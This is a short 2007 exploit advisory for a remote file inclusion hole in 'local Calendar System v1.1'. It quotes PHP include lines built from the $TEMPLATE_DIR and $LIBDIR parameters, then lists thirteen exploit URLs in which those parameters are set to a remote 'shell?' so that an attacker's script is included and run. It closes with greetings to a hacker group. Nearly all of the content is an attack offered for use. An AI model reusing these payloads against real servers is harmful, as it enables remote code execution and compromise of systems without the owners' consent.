lcs11-rfi.txt
Posted on 29 January 2007
+------------------------------------------------------------------------------------------- local Calendar System v1.1 (lcStdLib.inc) Remote File Include Tr_ZiNDaN trzindan@hotmail.fr Turkey -------------------------------------------------------------------------------------------- download : ftp://ftp.loci.wisc.edu/locisoftware/LoCal/LoCal-1.1.tar.gz -------------------------------------------------------------------------------------------- code : require "$TEMPLATE_DIR/header.inc"; require("$LIBDIR/lcStdLib.inc"); require("$LIBDIR/lcUser.php"); require ("$LIBDIR/lcGroup.inc"); require("$LIBDIR/lcCal.inc"); require("$LIBDIR/Calendar.inc"); require("$LIBDIR/lcErrorChecker.inc"); include ("$TEMPLATE_DIR/navbar.php"); include("$TEMPLATE_DIR/footer.inc"); -------------------------------------------------------------------------------------------- exploit: local/showinvoices.php?TEMPLATE_DIR=shell? local/editevent.php?LIBDIR=shell? local/resetpassword.php?LIBDIR=shell? local/signup.php?LIBDIR=shell? local/showmonth.php?TEMPLATE_DIR=shell? local/showmonth.php?LIBDIR=shell? local/showday.php?LIBDIR=shell? local/showevents.php?LIBDIR=shell? local/showevents.php?TEMPLATE_DIR=shell? local/retrieveinvoice.php?TEMPLATE_DIR=shell? local/modifyitem.php?TEMPLATE_DIR=shell? local/lookup_userid.php?LIBDIR=shell? local/lookup_userid.php?TEMPLATE_DIR=shell? -------------------------------------------------------------------------- Thanx str0ke,EL_MuHaMMeD,Crackers_Child,H0tturk,EntriKa,XYU,E-system,RedWorm Blackwolf,Mefisto,M3rhametsiz,Paradox_,Sehzade,Volqan,Arslan,KurtEfendy.. ------------------------------------------------------------------------- ##---ALL MusLim Hackers------------------------------------------------------------------------------------------------